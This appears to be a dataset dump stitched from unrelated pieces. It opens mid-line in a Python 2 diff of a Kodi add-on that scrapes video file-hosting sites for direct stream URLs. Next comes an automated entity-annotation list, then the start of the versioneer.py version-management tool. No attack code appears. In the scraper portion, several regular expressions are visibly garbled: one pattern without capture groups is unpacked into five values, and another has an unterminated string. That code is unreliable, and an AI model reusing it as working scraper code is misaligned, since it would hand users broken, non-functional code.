urllib2.URLError, e: + log(str(e), True) + return ('','') + else: + log(str(e), True) + return ('','') + + response_data = response.read() + response.close() + + op='' + for r in re.finditer('.*?.*?.*?.*?' ,response_data, re.DOTALL): + op,id,rand,referer,submit = r.groups() + values = { + 'op' : op, + 'id' : id, + 'rand' : rand, + 'referer' : referer, + 'method_free' : submit, + 'download_direct' : 1 + + } + + streamURL='' + + title = '' + for r in re.finditer('\<(title)\>([^\>]*)\<\/title\>' ,response_data, re.DOTALL): + titleID,title = r.groups() + + + # for thefile + if self.domain == 'thefile.me': + + downloadAddress = '' + for r in re.finditer('\<(img) src\=\""http\:\/\/([^\/]+)\/[^\""]+\"" style' ,response_data, re.DOTALL): + downloadTag,downloadAddress = r.groups() + + for r in re.finditer('(\|)([^\|]{56})\|' ,response_data, re.DOTALL): + deliminator,fileID = r.groups() + streamURL = 'http://'+str(downloadAddress)+'/d/'+fileID+'/video.mp4' + + elif self.domain == 'sharerepo.com': + for r in re.finditer('(file)\: \'([^\']+)\'\,' ,response_data, re.DOTALL): + streamType,streamURL = r.groups() + + for r in re.finditer('(\|)([^\|]{60})\|' ,response_data, re.DOTALL): + deliminator,fileID = r.groups() + streamURL = 'http://37.48.80.43/d/'+fileID+'/video.mp4?start=0' + + elif self.domain == 'filenuke.com': + for r in re.finditer('(\|)([^\|]{56})\|' ,response_data, re.DOTALL): + deliminator,fileID = r.groups() + streamURL = 'http://37.252.3.244/d/'+fileID+'/video.flv?start=0' + elif self.domain == 'sharerepo.com': + for r in re.finditer('(file)\: \'([^\']+)\'\,' ,response_data, re.DOTALL): + streamType,streamURL = r.groups() + + elif self.domain == 'letwatch.us': + + for r in re.finditer('\[IMG\]http://([^\/]+)\/', + response_data, re.DOTALL): + IP = r.group(1) + + for r in re.finditer('\|([^\|]{60})\|', + response_data, re.DOTALL): + fileID = r.group(1) + streamURL = 'http://'+IP+'/'+fileID+'/v.flv' + + elif self.domain == 'thevideo.me': + + for r in re.finditer('\,\s+\'file\'\s+\:\s+\'([^\']+)\'', + response_data, re.DOTALL): + streamURL = r.group(1) + + elif self.domain == 'vidto.me': + + for r in re.finditer('var file_link = \'([^\']+)\'', + response_data, re.DOTALL): + streamURL = r.group(1) + + elif self.domain == 'allmyvideos.net': + + for r in re.finditer('\""file\"" : \""([^\""]+)\""', + response_data, re.DOTALL): + streamURL = r.group(1) + + elif self.domain == 'realvid.net': + + for r in re.finditer('file:\s?\'([^\']+)\'', + response_data, re.DOTALL): + streamURL = r.group(1) + + elif self.domain == 'uptobox.com' or self.domain == 'uptostream.com': + + for r in re.finditer('\\s+\', + response_data, re.DOTALL): + streamURL = r.group(1) + return (streamURL, fname) + + for r in re.finditer('\(\d+) seconds' ,response_data, re.DOTALL): + id,timeout = r.groups() + + for r in re.finditer('

    (.*?)' ,response_data, re.DOTALL): + id,error = r.groups() + xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), error) + return ('','') + + + + + req = urllib2.Request(url) + + if timeout > 0: + xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30037) + str(timeout)) + + xbmc.sleep((int(timeout)+1)*1000) + + # if action fails, validate login + try: + response = opener.open(req, urllib.urlencode(values)) + + except urllib2.URLError, e: + if e.code == 403 or e.code == 401: + self.login() + + try: + response = opener.open(req, urllib.urlencode(values)) + except urllib2.URLError, e: + log(str(e), True) + return ('','') + else: + log(str(e), True) + return ('','') + + response_data = response.read() + response.close() + + for r in re.finditer('(Click here to start your download)' ,response_data, re.DOTALL): + streamURL,downloadlink = r.groups() + + #vodlocker.com + if streamURL == '': + # fetch video title, download URL and docid for stream link + for r in re.finditer('(file)\: \""([^\""]+)""\,' ,response_data, re.DOTALL): + streamType,streamURL = r.groups() + if 'mp4' in streamURL: + break + + # mightyupload.com + if streamURL == '': + # fetch video title, download URL and docid for stream link + for r in re.finditer('var (file_link) = \'([^\']+)\'' ,response_data, re.DOTALL): + streamType,streamURL = r.groups() + + # vidhog.com + if streamURL == '': + # fetch video title, download URL and docid for stream link + for r in re.finditer('(product_download_url)=([^\']+)\'' ,response_data, re.DOTALL): + streamType,streamURL = r.groups() + + # vidspot.net + if streamURL == '': + # fetch video title, download URL and docid for stream link + for r in re.finditer('""(file)"" : ""([^\""]+)""\,' ,response_data, re.DOTALL): + streamType,streamURL = r.groups() + + # uploadc.com + if streamURL == '': + # fetch video title, download URL and docid for stream link + for r in re.finditer('\'(file)\',\'([^\']+)\'\)\;' ,response_data, re.DOTALL): + streamType,streamURL = r.groups() + streamURL = streamURL + '|' + self.getHeadersEncoded(url) + +# return 'http://93.120.27.PI:KEY.mp4' + + + return (streamURL, fname) + +class MyHTTPErrorProcessor(urllib2.HTTPErrorProcessor): + + def http_response(self, request, response): + code, msg, hdrs = response.code, response.msg, response.info() + + # only add this line to stop 302 redirection. 
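+ # Returning the 302 untouched keeps urllib2 from following the redirect, + # so a caller wired up with this processor can read the Location header + # itself (as getPublicLink does when extracting a direct download URL).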
+ if code == 302: return response + + if not (200 <= code < 300): + response = self.parent.error( + 'http', request, response, code, msg, hdrs) + return response + + https_response = http_response + + +",33648,"[['URL', ""http://cloud1.hcbit.com/cgi-bin/dl.cgi/'+fileID+'/'+fileName""], ['DATE_TIME', '2013-2014'], ['LOCATION', 'xbmcaddon'], ['LOCATION', 'xbmcgui'], ['URL', 'xbmcaddon.Ad'], ['PERSON', 'LOGERROR'], ['PERSON', 'LOGDEBUG'], ['PERSON', 'MEDIA_TYPE_VIDEO'], ['URL', 'urllib2.HT'], ['URL', 'self.co'], ['URL', 'opener.ad'], ['URL', 'self.do'], ['URL', 'self.do'], ['PERSON', 'self.user'], ['URL', 'self.pa'], ['URL', 'e.co'], ['PERSON', 're.finditer'], ['PERSON', 'FireDrive'], ['PERSON', 'Referer'], ['PERSON', 'FireDrive'], ['LOCATION', 'getHeadersEncoded(self'], ['URL', 'self.ge'], ['URL', 'self.do'], ['URL', 'self.do'], ['URL', 'streamcloud.eu'], ['URL', 'urllib2.Re'], ['URL', 'self.ge'], ['URL', 'e.co'], ['URL', 'urllib2.Re'], ['URL', 'self.ge'], ['URL', 'urllib2.Re'], ['URL', 'self.ge'], ['URL', 'r.gr'], ['URL', 'plugin.video.cl'], ['URL', 'self.in'], ['URL', 'self.ME'], ['URL', 'r.gr'], ['URL', 'plugin.video.cl'], ['URL', 'self.in'], ['URL', 'self.ME'], ['URL', 'r.gr'], ['URL', 'plugin.video.cl'], ['URL', 'self.in'], ['URL', 'self.ME'], ['URL', 'r.gr'], ['URL', 'plugin.video.cl'], ['URL', 'self.in'], ['URL', 'self.ME'], ['URL', 'realvid.net'], ['URL', 'r.gr'], ['URL', 'plugin.video.cl'], ['URL', 'self.in'], ['URL', 'self.ME'], ['URL', 'plugin.video.cl'], ['URL', 'self.in'], ['URL', 'self.ME'], ['URL', 'urllib2.HT'], ['URL', 'self.co'], ['URL', 'opener.ad'], ['URL', 'urllib2.Re'], ['URL', 'response.cl'], ['URL', 'urllib2.HT'], ['URL', 'self.co'], ['URL', 'urllib2.HT'], ['URL', 'self.co'], ['URL', 'opener.ad'], ['PERSON', 'Referer'], ['URL', 'self.us'], ['URL', 'urllib2.Re'], ['URL', 'e.co'], ['URL', 'urllib2.Re'], ['URL', 'self.ge'], ['URL', 'urllib2.Re'], ['URL', 're.fi'], ['URL', 'urllib2.Re'], ['URL', 'self.ge'], ['URL', 'r.gr'], ['PERSON', 'fname'], ['URL', 're.fi'], ['LOCATION', 'fname'], ['LOCATION', 'fname'], ['PERSON', 'imhuman'], ['LOCATION', 'fname'], ['PERSON', 'imhuman'], ['LOCATION', 'fname'], ['PERSON', 'inhu'], ['PERSON', 'imhuman'], ['URL', 'urllib2.Re'], ['LOCATION', 'self.getHeadersList(url'], ['URL', 'self.ge'], ['URL', 'urllib2.Re'], ['URL', 'self.do'], ['URL', 'thefile.me'], ['URL', 'e.co'], ['URL', 'self.ge'], ['URL', 're.fi'], ['URL', 'r.gr'], ['URL', 'self.ge'], ['PERSON', 'fname'], ['URL', 're.fi'], ['LOCATION', ""re.finditer('(\\|)([^\\|]{42})\\|""], ['URL', 'self.ge'], ['PERSON', 'fname'], ['URL', 'self.do'], ['NRP', 'file_id'], ['LOCATION', ""re.finditer('\\''+variable+'\\""], ['NRP', 'file_id'], ['LOCATION', ""re.finditer('\\''+variable+'\\""], ['URL', 'urllib2.HT'], ['URL', 'self.co'], ['URL', 'opener.ad'], ['PERSON', 'Referer'], ['URL', 'r.gr'], ['URL', 'self.do'], ['URL', 'r.gr'], ['URL', 'e.co'], ['DATE_TIME', ""re.finditer('\\<(title)\\>([^\\>]*)\\<\\/title\\""], ['URL', 'video.mp'], ['URL', 'self.do'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 'video.mp'], ['URL', 'self.do'], ['URL', 'self.do'], ['URL', 'r.gr'], ['URL', 'self.do'], ['URL', 'self.do'], ['URL', 'r.gr'], ['URL', 'self.do'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'self.do'], ['URL', 'r.gr'], ['URL', 'self.do'], ['URL', 'r.gr'], ['URL', 'self.do'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 'r.gr'], ['URL', 're.fi'], ['PERSON', 'strong>(\\d+) seconds\''], ['URL', 'urllib2.Re'], ['URL', 'e.co'], ['URL', 'r.gr'], ['URL', 'vodlocker.com'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 
'r.gr'], ['URL', 'mightyupload.com'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'vidhog.com'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'vidspot.net'], ['URL', 're.fi'], ['LOCATION', '^\\""]+)""\\'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'uploadc.com'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'self.ge'], ['URL', 'KEY.mp'], ['URL', 'urllib2.HT'], ['URL', 'http://www.gnu.org/licenses/'], ['IP_ADDRESS', '37.48.80.43'], ['IP_ADDRESS', '37.252.3.244'], ['URL', 'plugin.video.cl'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'cloudservice.cl'], ['URL', 'self.us'], ['URL', 'self.do'], ['URL', 'uptostream.com'], ['URL', 'self.do'], ['URL', 'uptobox.com'], ['URL', 'self.do'], ['URL', 'self.us'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'response.re'], ['URL', 'response.cl'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'self.co'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'self.us'], ['URL', 'self.us'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'self.us'], ['URL', 'self.us'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'self.us'], ['URL', 'self.do'], ['URL', 'self.do'], ['URL', 'e.co'], ['URL', 'response.re'], ['URL', 'response.cl'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'response.re'], ['URL', 'response.cl'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'self.do'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 're.fi'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.su'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'self.us'], ['URL', 'self.us'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'e.co'], ['URL', 'response.re'], ['URL', 'response.cl'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'response.re'], ['URL', 'response.cl'], ['URL', 'self.do'], ['URL', 'vidzi.tv'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'self.do'], ['URL', 'sharesix.com'], ['URL', 'streamcloud.eu'], ['URL', 'self.do'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'xbmc.sl'], 
['URL', 'self.do'], ['URL', 'vidhog.com'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'xbmc.sl'], ['URL', 'self.do'], ['URL', 'vidto.me'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'xbmc.sl'], ['URL', 'self.do'], ['URL', 'vodlocker.com'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'xbmc.sl'], ['URL', 'self.do'], ['URL', 'hcbit.com'], ['URL', 'e.co'], ['URL', 'response.in'], ['URL', 'response.in'], ['URL', 're.DO'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'bestreams.net'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'xbmc.sl'], ['URL', 'self.us'], ['URL', 'self.do'], ['URL', 'thevideo.me'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'vidzi.tv'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'e.co'], ['URL', 'response.re'], ['URL', 'response.cl'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'self.do'], ['URL', 'thefile.me'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'sharerepo.com'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'filenuke.com'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'sharerepo.com'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'letwatch.us'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'thevideo.me'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'vidto.me'], ['URL', 're.fi'], ['URL', 'allmyvideos.net'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'realvid.net'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'uptobox.com'], ['URL', 'self.do'], ['URL', 'uptostream.com'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 're.DO'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'xbmc.sl'], ['URL', 'e.co'], ['URL', 'response.re'], ['URL', 'response.cl'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'response.co'], ['URL', 'response.ms'], ['URL', 'response.in'], ['URL', 'self.parent.er']]" +108," +# Version: 0.15+dev + +""""""The Versioneer - like a rocketeer, but for versions. + +The Versioneer +============== + +* like a rocketeer, but for versions! +* https://github.com/warner/python-versioneer +* Brian Warner +* License: Public Domain +* Compatible With: python2.6, 2.7, 3.2, 3.3, 3.4, and pypy +* [![Latest Version] +(https://pypip.in/version/versioneer/badge.svg?style=flat) +](https://pypi.python.org/pypi/versioneer/) +* [![Build Status] +(https://travis-ci.org/warner/python-versioneer.png?branch=master) +](https://travis-ci.org/warner/python-versioneer) + +This is a tool for managing a recorded version number in distutils-based +python projects. The goal is to remove the tedious and error-prone ""update +the embedded version string"" step from your release process. Making a new +release should be as easy as recording a new tag in your version-control +system, and maybe making new tarballs. 
+
+
+## Quick Install
+
+* `pip install versioneer` to somewhere in your $PATH
+* add a `[versioneer]` section to your setup.cfg (see below)
+* run `versioneer install` in your source tree, commit the results
+
+## Version Identifiers
+
+Source trees come from a variety of places:
+
+* a version-control system checkout (mostly used by developers)
+* a nightly tarball, produced by build automation
+* a snapshot tarball, produced by a web-based VCS browser, like github's
+  ""tarball from tag"" feature
+* a release tarball, produced by ""setup.py sdist"", distributed through PyPI
+
+Within each source tree, the version identifier (either a string or a number,
+this tool is format-agnostic) can come from a variety of places:
+
+* ask the VCS tool itself, e.g. ""git describe"" (for checkouts), which knows
+  about recent ""tags"" and an absolute revision-id
+* the name of the directory into which the tarball was unpacked
+* an expanded VCS keyword ($Id$, etc)
+* a `_version.py` created by some earlier build step
+
+For released software, the version identifier is closely related to a VCS
+tag. Some projects use tag names that include more than just the version
+string (e.g. ""myproject-1.2"" instead of just ""1.2""), in which case the tool
+needs to strip the tag prefix to extract the version identifier. For
+unreleased software (between tags), the version identifier should provide
+enough information to help developers recreate the same tree, while also
+giving them an idea of roughly how old the tree is (after version 1.2, before
+version 1.3). Many VCS systems can report a description that captures this,
+for example `git describe --tags --dirty --always` reports things like
+""0.7-1-g574ab98-dirty"" to indicate that the checkout is one revision past the
+0.7 tag, has a unique revision id of ""574ab98"", and is ""dirty"" (it has
+uncommitted changes).
+
+The version identifier is used for multiple purposes:
+
+* to allow the module to self-identify its version: `myproject.__version__`
+* to choose a name and prefix for a 'setup.py sdist' tarball
+
+## Theory of Operation
+
+Versioneer works by adding a special `_version.py` file into your source
+tree, where your `__init__.py` can import it. This `_version.py` knows how to
+dynamically ask the VCS tool for version information at import time.
+
+`_version.py` also contains `$Revision$` markers, and the installation
+process marks `_version.py` to have this marker rewritten with a tag name
+during the `git archive` command. As a result, generated tarballs will
+contain enough information to get the proper version.
+
+To allow `setup.py` to compute a version too, a `versioneer.py` is added to
+the top level of your source tree, next to `setup.py` and the `setup.cfg`
+that configures it. This overrides several distutils/setuptools commands to
+compute the version when invoked, and changes `setup.py build` and `setup.py
+sdist` to replace `_version.py` with a small static file that contains just
+the generated version data.
+
+## Installation
+
+First, decide on values for the following configuration variables:
+
+* `VCS`: the version control system you use. Currently accepts ""git"".
+
+* `style`: the style of version string to be produced. See ""Styles"" below for
+  details. Defaults to ""pep440"", which looks like
+  `TAG[+DISTANCE.gSHORTHASH[.dirty]]`.
+
+* `versionfile_source`:
+
+  A project-relative pathname into which the generated version strings should
+  be written.
This is usually a `_version.py` next to your project's main
+  `__init__.py` file, so it can be imported at runtime. If your project uses
+  `src/myproject/__init__.py`, this should be `src/myproject/_version.py`.
+  This file should be checked in to your VCS as usual: the copy created below
+  by `setup.py setup_versioneer` will include code that parses expanded VCS
+  keywords in generated tarballs. The 'build' and 'sdist' commands will
+  replace it with a copy that has just the calculated version string.
+
+  This must be set even if your project does not have any modules (and will
+  therefore never import `_version.py`), since ""setup.py sdist"" -based trees
+  still need somewhere to record the pre-calculated version strings. Anywhere
+  in the source tree should do. If there is a `__init__.py` next to your
+  `_version.py`, the `setup.py setup_versioneer` command (described below)
+  will append some `__version__`-setting assignments, if they aren't already
+  present.
+
+* `versionfile_build`:
+
+  Like `versionfile_source`, but relative to the build directory instead of
+  the source directory. These will differ when your setup.py uses
+  'package_dir='. If you have `package_dir={'myproject': 'src/myproject'}`,
+  then you will probably have `versionfile_build='myproject/_version.py'` and
+  `versionfile_source='src/myproject/_version.py'`.
+
+  If this is set to None, then `setup.py build` will not attempt to rewrite
+  any `_version.py` in the built tree. If your project does not have any
+  libraries (e.g. if it only builds a script), then you should use
+  `versionfile_build = None`. To actually use the computed version string,
+  your `setup.py` will need to override `distutils.command.build_scripts`
+  with a subclass that explicitly inserts a copy of
+  `versioneer.get_version()` into your script file. See
+  `test/demoapp-script-only/setup.py` for an example.
+
+* `tag_prefix`:
+
+  a string, like 'PROJECTNAME-', which appears at the start of all VCS tags.
+  If your tags look like 'myproject-1.2.0', then you should use
+  tag_prefix='myproject-'. If you use unprefixed tags like '1.2.0', this
+  should be an empty string, using either `tag_prefix=` or `tag_prefix=''`.
+
+* `parentdir_prefix`:
+
+  an optional string, frequently the same as tag_prefix, which appears at the
+  start of all unpacked tarball filenames. If your tarball unpacks into
+  'myproject-1.2.0', this should be 'myproject-'. To disable this feature,
+  just omit the field from your `setup.cfg`.
+
+This tool provides one script, named `versioneer`. That script has one mode,
+""install"", which writes a copy of `versioneer.py` into the current directory
+and runs `versioneer.py setup` to finish the installation.
+
+To versioneer-enable your project:
+
+* 1: Modify your `setup.cfg`, adding a section named `[versioneer]` and
+  populating it with the configuration values you decided earlier (note that
+  the option names are not case-sensitive):
+
+  ````
+  [versioneer]
+  VCS = git
+  style = pep440
+  versionfile_source = src/myproject/_version.py
+  versionfile_build = myproject/_version.py
+  tag_prefix =
+  parentdir_prefix = myproject-
+  ````
+
+* 2: Run `versioneer install`.
This will do the following:
+
+  * copy `versioneer.py` into the top of your source tree
+  * create `_version.py` in the right place (`versionfile_source`)
+  * modify your `__init__.py` (if one exists next to `_version.py`) to define
+    `__version__` (by calling a function from `_version.py`)
+  * modify your `MANIFEST.in` to include both `versioneer.py` and the
+    generated `_version.py` in sdist tarballs
+
+  `versioneer install` will complain about any problems it finds with your
+  `setup.py` or `setup.cfg`. Run it multiple times until you have fixed all
+  the problems.
+
+* 3: add an `import versioneer` to your setup.py, and add the following
+  arguments to the setup() call:
+
+        version=versioneer.get_version(),
+        cmdclass=versioneer.get_cmdclass(),
+
+* 4: commit these changes to your VCS. To make sure you won't forget,
+  `versioneer install` will mark everything it touched for addition using
+  `git add`. Don't forget to add `setup.py` and `setup.cfg` too.
+
+## Post-Installation Usage
+
+Once established, all uses of your tree from a VCS checkout should get the
+current version string. All generated tarballs should include an embedded
+version string (so users who unpack them will not need a VCS tool installed).
+
+If you distribute your project through PyPI, then the release process should
+boil down to two steps:
+
+* 1: git tag 1.0
+* 2: python setup.py register sdist upload
+
+If you distribute it through github (i.e. users use github to generate
+tarballs with `git archive`), the process is:
+
+* 1: git tag 1.0
+* 2: git push; git push --tags
+
+Versioneer will report ""0+untagged.NUMCOMMITS.gHASH"" until your tree has at
+least one tag in its history.
+
+## Version-String Flavors
+
+Code which uses Versioneer can learn about its version string at runtime by
+importing `_version` from your main `__init__.py` file and running the
+`get_versions()` function. From the ""outside"" (e.g. in `setup.py`), you can
+import the top-level `versioneer.py` and run `get_versions()`.
+
+Both functions return a dictionary with different flavors of version
+information:
+
+* `['version']`: A condensed version string, rendered using the selected
+  style. This is the most commonly used value for the project's version
+  string. The default ""pep440"" style yields strings like `0.11`,
+  `0.11+2.g1076c97`, or `0.11+2.g1076c97.dirty`. See the ""Styles"" section
+  below for alternative styles.
+
+* `['full-revisionid']`: detailed revision identifier. For Git, this is the
+  full SHA1 commit id, e.g. ""PI:KEY"".
+
+* `['dirty']`: a boolean, True if the tree has uncommitted changes. Note that
+  this is only accurate if run in a VCS checkout, otherwise it is likely to
+  be False or None.
+
+* `['error']`: if the version string could not be computed, this will be set
+  to a string describing the problem, otherwise it will be None. It may be
+  useful to throw an exception in setup.py if this is set, to avoid e.g.
+  creating tarballs with a version string of ""unknown"".
+
+Some variants are more useful than others. Including `full-revisionid` in a
+bug report should allow developers to reconstruct the exact code being tested
+(or indicate the presence of local changes that should be shared with the
+developers). `version` is suitable for display in an ""about"" box or a CLI
+`--version` output: it can be easily compared against release notes and lists
+of bugs fixed in various releases.
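+
+As a concrete sketch of the `['error']` flavor (this snippet is illustrative
+and not part of Versioneer itself), a `setup.py` might refuse to build
+artifacts when the version could not be computed:
+
+    from distutils.core import setup
+    import versioneer
+
+    versions = versioneer.get_versions()
+    if versions['error'] is not None:
+        # fail fast instead of shipping a tarball versioned '0+unknown'
+        raise RuntimeError('version lookup failed: ' + versions['error'])
+
+    setup(version=versions['version'],
+          cmdclass=versioneer.get_cmdclass())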
+
+The installer adds the following text to your `__init__.py` to place a basic
+version in `YOURPROJECT.__version__`:
+
+    from ._version import get_versions
+    __version__ = get_versions()['version']
+    del get_versions
+
+## Styles
+
+The setup.cfg `style=` configuration controls how the VCS information is
+rendered into a version string.
+
+The default style, ""pep440"", produces a PEP440-compliant string, equal to the
+un-prefixed tag name for actual releases, and containing an additional ""local
+version"" section with more detail for in-between builds. For Git, this is
+TAG[+DISTANCE.gHEX[.dirty]] , using information from `git describe --tags
+--dirty --always`. For example ""0.11+2.g1076c97.dirty"" indicates that the
+tree is like the ""1076c97"" commit but has uncommitted changes ("".dirty""), and
+that this commit is two revisions (""+2"") beyond the ""0.11"" tag. For released
+software (exactly equal to a known tag), the identifier will only contain the
+stripped tag, e.g. ""0.11"".
+
+Other styles are available. See details.md in the Versioneer source tree for
+descriptions.
+
+## Debugging
+
+Versioneer tries to avoid fatal errors: if something goes wrong, it will tend
+to return a version of ""0+unknown"". To investigate the problem, run `setup.py
+version`, which will run the version-lookup code in a verbose mode, and will
+display the full contents of `get_versions()` (including the `error` string,
+which may help identify what went wrong).
+
+## Updating Versioneer
+
+To upgrade your project to a new release of Versioneer, do the following:
+
+* install the new Versioneer (`pip install -U versioneer` or equivalent)
+* edit `setup.cfg`, if necessary, to include any new configuration settings
+  indicated by the release notes
+* re-run `versioneer install` in your source tree, to replace
+  `SRC/_version.py`
+* commit any changed files
+
+### Upgrading to 0.15
+
+Starting with this version, Versioneer is configured with a `[versioneer]`
+section in your `setup.cfg` file. Earlier versions required the `setup.py` to
+set attributes on the `versioneer` module immediately after import. The new
+version will refuse to run (raising an exception during import) until you
+have provided the necessary `setup.cfg` section.
+
+In addition, the Versioneer package provides an executable named
+`versioneer`, and the installation process is driven by running `versioneer
+install`. In 0.14 and earlier, the executable was named
+`versioneer-installer` and was run without an argument.
+
+### Upgrading to 0.14
+
+0.14 changes the format of the version string. 0.13 and earlier used
+hyphen-separated strings like ""0.11-2-g1076c97-dirty"". 0.14 and beyond use a
+plus-separated ""local version"" section, with dot-separated components, like
+""0.11+2.g1076c97"". PEP440-strict tools did not like the old format, but
+should be ok with the new one.
+
+### Upgrading from 0.11 to 0.12
+
+Nothing special.
+
+### Upgrading from 0.10 to 0.11
+
+You must add a `versioneer.VCS = ""git""` line to your `setup.py` before
+re-running `setup.py setup_versioneer`. This will enable the use of
+additional version-control systems (SVN, etc) in the future.
+
+## Future Directions
+
+This tool is designed to be easily extended to other version-control
+systems: all VCS-specific components are in separate directories like
+src/git/ . The top-level `versioneer.py` script is assembled from these
+components by running make-versioneer.py .
In the future, make-versioneer.py
+will take a VCS name as an argument, and will construct a version of
+`versioneer.py` that is specific to the given VCS. It might also take the
+configuration arguments that are currently provided manually during
+installation by editing setup.py . Alternatively, it might go the other
+direction and include code from all supported VCS systems, reducing the
+number of intermediate scripts.
+
+
+## License
+
+To make Versioneer easier to embed, all its code is dedicated to the public
+domain. The `_version.py` that it creates is also in the public domain.
+Specifically, both are released under the Creative Commons ""Public Domain
+Dedication"" license (CC0-1.0), as described in
+https://creativecommons.org/publicdomain/zero/1.0/ .
+
+""""""
+
+from __future__ import print_function
+try:
+    import configparser
+except ImportError:
+    import ConfigParser as configparser
+import errno
+import json
+import os
+import re
+import subprocess
+import sys
+
+
+class VersioneerConfig:
+
+    """"""Container for Versioneer configuration parameters.""""""
+
+
+def get_root():
+    """"""Get the project root directory.
+
+    We require that all commands are run from the project root, i.e. the
+    directory that contains setup.py, setup.cfg, and versioneer.py .
+    """"""
+    root = os.path.realpath(os.path.abspath(os.getcwd()))
+    setup_py = os.path.join(root, ""setup.py"")
+    versioneer_py = os.path.join(root, ""versioneer.py"")
+    if not (os.path.exists(setup_py) or os.path.exists(versioneer_py)):
+        # allow 'python path/to/setup.py COMMAND'
+        root = os.path.dirname(os.path.realpath(os.path.abspath(sys.argv[0])))
+        setup_py = os.path.join(root, ""setup.py"")
+        versioneer_py = os.path.join(root, ""versioneer.py"")
